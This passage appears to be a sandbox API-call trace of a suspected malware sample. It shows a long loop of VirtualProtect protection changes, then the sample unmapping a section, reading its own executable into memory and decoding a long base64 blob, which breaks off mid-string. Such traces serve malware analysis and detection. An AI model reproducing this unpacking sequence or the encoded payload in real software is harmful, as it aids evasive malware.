(in: lpAddress=0x1e726fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.810] VirtualProtect (in: lpAddress=0x1e72700, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.810] VirtualProtect (in: lpAddress=0x1e72700, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.810] VirtualProtect (in: lpAddress=0x1e72704, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.810] VirtualProtect (in: lpAddress=0x1e72704, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.810] VirtualProtect (in: lpAddress=0x1e72708, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.811] VirtualProtect (in: lpAddress=0x1e72708, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.811] VirtualProtect (in: lpAddress=0x1e7270c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.811] VirtualProtect (in: lpAddress=0x1e7270c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.811] VirtualProtect (in: lpAddress=0x1e72710, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.811] VirtualProtect (in: lpAddress=0x1e72710, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.811] VirtualProtect (in: lpAddress=0x1e72714, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.812] VirtualProtect (in: lpAddress=0x1e72714, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.812] VirtualProtect (in: lpAddress=0x1e72718, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.812] VirtualProtect (in: lpAddress=0x1e72718, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.812] VirtualProtect (in: lpAddress=0x1e7271c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.812] VirtualProtect (in: lpAddress=0x1e7271c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.812] VirtualProtect (in: lpAddress=0x1e72720, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.813] VirtualProtect (in: lpAddress=0x1e72720, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.813] VirtualProtect (in: lpAddress=0x1e72724, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.813] VirtualProtect (in: lpAddress=0x1e72724, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.813] VirtualProtect (in: lpAddress=0x1e72728, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.813] VirtualProtect (in: lpAddress=0x1e72728, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.814] VirtualProtect (in: lpAddress=0x1e7272c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.814] VirtualProtect (in: lpAddress=0x1e7272c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.814] VirtualProtect (in: lpAddress=0x1e72730, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.814] VirtualProtect (in: lpAddress=0x1e72730, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.814] VirtualProtect (in: lpAddress=0x1e72734, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.814] VirtualProtect (in: lpAddress=0x1e72734, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.815] VirtualProtect (in: lpAddress=0x1e72738, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.815] VirtualProtect (in: lpAddress=0x1e72738, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.815] VirtualProtect (in: lpAddress=0x1e7273c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.815] VirtualProtect (in: lpAddress=0x1e7273c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.815] VirtualProtect (in: lpAddress=0x1e72740, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.815] VirtualProtect (in: lpAddress=0x1e72740, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.816] VirtualProtect (in: lpAddress=0x1e72744, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.816] VirtualProtect (in: lpAddress=0x1e72744, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.816] VirtualProtect (in: lpAddress=0x1e72748, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.816] VirtualProtect (in: lpAddress=0x1e72748, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.816] VirtualProtect (in: lpAddress=0x1e7274c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.817] VirtualProtect (in: lpAddress=0x1e7274c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.817] VirtualProtect (in: lpAddress=0x1e72750, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.817] VirtualProtect (in: lpAddress=0x1e72750, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.817] VirtualProtect (in: lpAddress=0x1e72754, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.817] VirtualProtect (in: lpAddress=0x1e72754, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.818] VirtualProtect (in: lpAddress=0x1e72758, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.818] VirtualProtect (in: lpAddress=0x1e72758, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.818] VirtualProtect (in: lpAddress=0x1e7275c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.818] VirtualProtect (in: lpAddress=0x1e7275c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.818] VirtualProtect (in: lpAddress=0x1e72760, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.818] VirtualProtect (in: lpAddress=0x1e72760, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.819] VirtualProtect (in: lpAddress=0x1e72764, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.819] VirtualProtect (in: lpAddress=0x1e72764, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.819] VirtualProtect (in: lpAddress=0x1e72768, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.819] VirtualProtect (in: lpAddress=0x1e72768, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.819] VirtualProtect (in: lpAddress=0x1e7276c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.819] VirtualProtect (in: lpAddress=0x1e7276c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.820] VirtualProtect (in: lpAddress=0x1e72770, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.820] VirtualProtect (in: lpAddress=0x1e72770, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.820] VirtualProtect (in: lpAddress=0x1e72774, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.820] VirtualProtect (in: lpAddress=0x1e72774, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.820] VirtualProtect (in: lpAddress=0x1e72778, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.821] VirtualProtect (in: lpAddress=0x1e72778, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.821] VirtualProtect (in: lpAddress=0x1e7277c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.821] VirtualProtect (in: lpAddress=0x1e7277c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.821] VirtualProtect (in: lpAddress=0x1e72780, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.821] VirtualProtect (in: lpAddress=0x1e72780, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.821] VirtualProtect (in: lpAddress=0x1e72784, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.822] VirtualProtect (in: lpAddress=0x1e72784, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.822] VirtualProtect (in: lpAddress=0x1e72788, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.822] VirtualProtect (in: lpAddress=0x1e72788, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.822] VirtualProtect (in: lpAddress=0x1e7278c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.822] VirtualProtect (in: lpAddress=0x1e7278c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.822] VirtualProtect (in: lpAddress=0x1e72790, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.823] VirtualProtect (in: lpAddress=0x1e72790, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.823] VirtualProtect (in: lpAddress=0x1e72794, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.823] VirtualProtect (in: lpAddress=0x1e72794, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.823] VirtualProtect (in: lpAddress=0x1e72798, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.823] VirtualProtect (in: lpAddress=0x1e72798, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.824] VirtualProtect (in: lpAddress=0x1e7279c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.824] VirtualProtect (in: lpAddress=0x1e7279c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.824] VirtualProtect (in: lpAddress=0x1e727a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.824] VirtualProtect (in: lpAddress=0x1e727a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.824] VirtualProtect (in: lpAddress=0x1e727a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.824] VirtualProtect (in: lpAddress=0x1e727a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.825] VirtualProtect (in: lpAddress=0x1e727a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.825] VirtualProtect (in: lpAddress=0x1e727a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.825] VirtualProtect (in: lpAddress=0x1e727ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.825] VirtualProtect (in: lpAddress=0x1e727ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.825] VirtualProtect (in: lpAddress=0x1e727b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.825] VirtualProtect (in: lpAddress=0x1e727b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.826] VirtualProtect (in: lpAddress=0x1e727b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.826] VirtualProtect (in: lpAddress=0x1e727b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.826] VirtualProtect (in: lpAddress=0x1e727b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.826] VirtualProtect (in: lpAddress=0x1e727b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.826] VirtualProtect (in: lpAddress=0x1e727bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.826] VirtualProtect (in: lpAddress=0x1e727bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.827] VirtualProtect (in: lpAddress=0x1e727c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.827] VirtualProtect (in: lpAddress=0x1e727c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.827] VirtualProtect (in: lpAddress=0x1e727c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.827] VirtualProtect (in: lpAddress=0x1e727c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.827] VirtualProtect (in: lpAddress=0x1e727c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.828] VirtualProtect (in: lpAddress=0x1e727c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.828] VirtualProtect (in: lpAddress=0x1e727cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.828] VirtualProtect (in: lpAddress=0x1e727cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.828] VirtualProtect (in: lpAddress=0x1e727d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.828] VirtualProtect (in: lpAddress=0x1e727d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.828] VirtualProtect (in: lpAddress=0x1e727d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.829] VirtualProtect (in: lpAddress=0x1e727d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.829] VirtualProtect (in: lpAddress=0x1e727d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.829] VirtualProtect (in: lpAddress=0x1e727d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.829] VirtualProtect (in: lpAddress=0x1e727dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.829] VirtualProtect (in: lpAddress=0x1e727dc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.829] VirtualProtect (in: lpAddress=0x1e727e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.830] VirtualProtect (in: lpAddress=0x1e727e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.830] VirtualProtect (in: lpAddress=0x1e727e4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.830] VirtualProtect (in: lpAddress=0x1e727e4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.830] VirtualProtect (in: lpAddress=0x1e727e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.830] VirtualProtect (in: lpAddress=0x1e727e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.831] VirtualProtect (in: lpAddress=0x1e727ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.831] VirtualProtect (in: lpAddress=0x1e727ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.831] VirtualProtect (in: lpAddress=0x1e727f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.831] VirtualProtect (in: lpAddress=0x1e727f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.831] VirtualProtect (in: lpAddress=0x1e727f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.831] VirtualProtect (in: lpAddress=0x1e727f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0044.829] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x1e60000) returned 0x0 [0044.833] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fba0 | out: DllHandle=0x18fba0*=0x76c20000) returned 0x0 [0044.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.833] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0044.834] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb88 | out: DllHandle=0x18fb88*=0x76c20000) returned 0x0 [0044.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\$rjd3z6k.tmp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xbc [0044.835] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb9c | out: DllHandle=0x18fb9c*=0x76c20000) returned 0x0 [0044.835] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.835] GetFileSize (in: hFile=0xbc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ab58 [0044.836] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb94 | out: DllHandle=0x18fb94*=0x76c20000) returned 0x0 [0044.836] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.836] VirtualAlloc (lpAddress=0x0, dwSize=0x3ab58, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000 [0044.836] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb90 | out: DllHandle=0x18fb90*=0x76c20000) returned 0x0 [0044.837] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.837] ReadFile (in: hFile=0xbc, lpBuffer=0x1b90000, nNumberOfBytesToRead=0x3ab58, lpNumberOfBytesRead=0x18fc1c, lpOverlapped=0x0 | out: lpBuffer=0x1b90000*, lpNumberOfBytesRead=0x18fc1c*=0x3ab58, lpOverlapped=0x0) returned 1 [0044.842] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb94 | out: DllHandle=0x18fb94*=0x76c20000) returned 0x0 [0044.843] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.843] VirtualAlloc (lpAddress=0x0, dwSize=0x24b4c, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0044.846] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb88 | out: DllHandle=0x18fb88*=0x76c20000) returned 0x0 [0044.846] GetModuleHandleA (lpModuleName="Crypt32.dll") returned 0x0 [0044.846] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x759b0000 [0045.132] CryptStringToBinaryA (in: pszString="OjAAAEh2WnR0aDlKYzBNcFNvAAAAAAAAyuMFu7in9oWo/4K/Y3i5lQO7p/aFrP+C/5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFdP+Cv5KYA5u7D647pBT+znK909H8yJvXhOrLjePSvOTY+9XU09bnyd/wyvKn0Pub/+ilpcGQ5tqyirSfn7un9oWs/4KGe0D46D0StYsDBe3/OTWVq2WMqc5wLL7tcryOvD88qalX9JfOeSut6HmDh8k9DuT4KleQuBouq4dLvbWEAwXtkE+olcUTEqn1n+bEggQWjoe5lbu7p/aF/LqCv9CGu5UqjzCrhaz/gr+ch7l1u7mm/YSm/4L/nYe5jbu7p/aFrOJbv5yHqZW7u/f3haz/wr+cl7mVu7mn9oCs/oK/nIe5kLu6p/aFrP+Cz52HuZG7u6f2haz9gv8dh7mFu7u39oWs/5K/nJe5lbu7p/aVrP+Cv5yHuZW7u6cSxq3/Ir+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5zXuJVftqf2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yH7ZW7+6f2haz/gr+ch7mVu6un9lGt/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2hazR9trk87mVuyeZ94Ws74K/nMe4lbu/p/aFrP+Cv5yHuZW7u6fWhawfrM3569b2u7tT4YWs/9K+nIehlbu74/eFrP+Cv5yHuZW7u6f2xaz/wL+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f